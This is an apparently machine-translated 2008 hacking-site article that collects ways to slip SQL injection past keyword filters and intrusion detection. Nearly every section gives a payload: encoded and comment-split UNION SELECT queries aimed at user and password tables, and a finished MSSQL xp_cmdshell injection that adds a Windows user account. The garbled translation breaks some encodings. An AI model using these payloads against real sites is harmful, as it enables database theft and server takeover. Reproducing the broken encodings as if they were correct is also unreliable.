Breakthrough SQL injection limit of a little thought-vulnerability warning-the black bar safety net

ID MYHACK58:62200818821
Type myhack58
Reporter 佚名
Modified 2008-04-17T00:00:00


Suddenly wonder if we can use what method to bypassSQL injectionlimit? Online to study a bit, and the method mentioned most of them are for AND with“'”and“=”, filter breakthrough, although a little progress, but still there are some keyword is not a bypass, because I don't ofteninvasionsite so did not dare to the above-mentioned filtering effect of the comment, but to be sure, the effect is not very good......

Through my collection, most of the anti-injection procedures are filtered by the following keywords:

and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =

And here the most difficult is to select the keywords, then how are we to break them? The problem although not completely solved, but still say to share with you, hoping to initiate it.

For the keyword filter, the following is my collection and I own personal some ideas.

1, The use of encoding techniques to bypass As the URLEncode encoding, ASCII encoding bypass. Such as or 1=1 i.e.,%6f%7 2% 2 0% 3 1%3d%3 1, and the Test can also be CHAR(1 0 1)+CHAR(9 7)+CHAR(1 1 5)+CHAR(1 1 6). The

2, through the space bypass As two spaces instead of one space, use a Tab instead of spaces, etc., or Remove All Spaces, such as or' swords' =‘swords', due to the mssql loose, we can put or 'swords' between the spaces removed, does not affect operation.

3, The use of the string determines the place of the With classic or 1=1 determines whether the bypass,such as or 'swords' ='swords', this method is online in the discussion.

4, through the type conversion modifiers N bypass You can say this is a good idea that he can somehow bypass the limit, but there's another role, we think about it. On the use of, such as or 'swords' = N' swords', capital N tell mssql server string as a nvarchar type, which plays to a type conversion role, does not affect the injection of the statement itself, but can be avoided through knowledge-based pattern matching IDS.

5, by+sign in the dismantling of the string bypass The effect is worthy of research, but after all is a method. Such as or 'swords' =‘sw' +' ords'; and EXEC(‘IN' +' SERT INTO'+' .....' )

6, By LIKE bypassing Before how you did not expect? Such as or 'swords' LIKE 'sw'it!!! Obviously you can easily bypass“=”“>”limit......

7, through IN bypass With the above LIKE thinking about,such as or 'swords' IN ('swords')

8, By BETWEEN bypass Such as or 'swords' BETWEEN 'rw' AND 'tw'

9, by>or<a bypass or 'swords' > 'sw' or 'swords' < 'tw' or 1<3


1 0, use the comment statement to bypass Use//instead of a space, such as: UNION // Select /**/user, pwd, from tbluser

Use//split sensitive words, such as: U// NION // SE// LECT /**/user, pwd from tbluser

1 1, with the HEX bypass, generally the IDS are unable to detect out 0x730079007300610064006D0069006E00 =hex(sysadmin) 0x640062005F006F0077006E0065007200 =hex(db_owner)

In addition, on the common point of the filtering method, we can consider using the assignment method, for example, declare a variable a, then put our instruction to assign a value to a, and then call the variable a The final implementation of our input commands. The variable a can be any command. As follows:

declare @a sysname select @a= exec master. dbo. xp_cmdshell @a

Effect:;declare%2 0@a% 20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;--

Wherein the 0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 is the“net user angel pass /add”means.

I hereby throw a brick, hope which heroes to admire the piece of jade, then I'll be satisfied......